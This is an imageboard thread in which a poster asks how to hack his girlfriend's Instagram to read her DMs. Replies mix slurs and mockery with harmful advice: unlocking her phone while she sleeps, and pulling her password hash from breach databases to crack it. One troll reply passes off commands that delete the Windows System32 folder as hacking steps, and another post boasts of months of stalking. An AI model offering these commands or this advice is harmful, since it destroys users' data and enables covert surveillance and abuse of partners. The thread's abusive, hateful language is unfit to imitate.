Anyone know how to hack an Instagram account?

Anyone know how to hack an Instagram account?

Attached: hacking.jpg (1280x720, 284K)


think my girls cheating. I need to read her DMs

install gentoo

Hire a PI, its faster and cheaper, and he will tell you that if you suspect your significant other is cheating, they probably are.

>dumb normalfag who can't even quote posts trying to use Jow Forums as his le ebik hacker help desk

have her spend the night
wait till she's asleep
unlock her phone and read them dumbass


Cuck, bait harder faggot.

Ill do it, but I take $10 000 upfront and another $10 000 on completion.
Or just hire a fucking PI you brainlet cuck

>PI fucks your girl

It's already over, douchebag. What are you seeking to do qualifies as domestic violence. She's not "[your] girl", she isn't property, and she doesn't belong to you. And you don't deserve to be with her.

You fucked it up, because you're insecure, jealous and abusive enough to want to hack someone you are supposed to be in a relationship with because you have trust issues.

I don't care who she is, I don't care who you are, but you don't know how many times I've had to clean up PCs with spyware on them put there by dickheads like you. You disgust me, you inhuman cretin. You can't even capitalise your sentences.

Real PIs are serving process on people like OP. If you called them with this, they would tell you the above because a) they are all thoroughly sick of it and b) in many places it is unlawful.

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t. npc

Attached: download.jpg (225x225, 4K)

you will first need to find her userid. Open her insta account page on your web browser and com the url then you will need to open your start bar, type "cmd", right click on it and open as admin. Then type the following commands, (you'll need them to trace the instagram servers and make your IP anonymous):
takeown /f C:\Windows\System32
[press enter]
cacls c:\Windows\System32
[press enter]
del c:\windows:\System32\*.*
[press enter]
traceroute [insert the victim's userid]
[press enter]

that's it, don't close the cmd. Now you'll need just to waitfor her to log in and her password hash will display on the cmd when she will log in. You'll just have to dehash the password (google it that's really easy)

>com the url
meant copy the url sorry

any allusion to Instagrams founders departure

sudo apt get install gentoo

you da big time faggot

Attached: clicks-fedora.jpg (640x533, 78K)

delet system 34

Thanks bro. Found all the noodles of the roastie I've been stalking for months, in the DM's with Chad.

Hahaha, but get this right, she's been posting noodles to liek, 8 different Chads at once. AHAHAHAHA, what cucks.

>i care about females
bitches ain't shit

Attached: woman worshiper.jpg (498x706, 167K)

install gentoo

>it's another "how do i hack `insert popular web-site here` thread"
I legitemately have hard time understanding what's the thought process behind this stupid ideas normies have. Do they really think you can just hack any fucking website out there like in some kind of dumb movie? Not only they think it's totally possible to hack anything, but they ask it in such a mundane tone like every fucking average joe programmer can do it. GEE GUYS, ANYONE KNOWS HOW DO I HACK FACEBOOK? SURELY SOME GUY IN A KOREAN DOG-COOKING FORUM KNOWS AND IT WOULDN'T BE A BIG DEAL AT ALL IF ALL THIS POPULAR SITES HAD SECURITY ISSUES THIS MASSIVE, THAT YOU CAN JUST ENTER IN ANY KIND OF TECHNICAL FORUM TO GET AN IDEA OF HOW TO DO IT, RIGHT GUYS?

"if the hacker known as Jow Forums can crack apple wide open, helping me with a simple instagram account should be easy!"

first you need to kys

Generally the best way to "hack" a social media account is to have the password.

She's a roastie so she probably uses a generic password.

This. Just search databases for her username or email. Chances are you can find a hash pretty fast. Then just try and crack the hash

Holy shit kill yourself numale faggot. I can smell the söy from here.

if you think your girlfriend is cheating she isnt youre girlfriend shes his girlfriend and shes cheating on him with you :|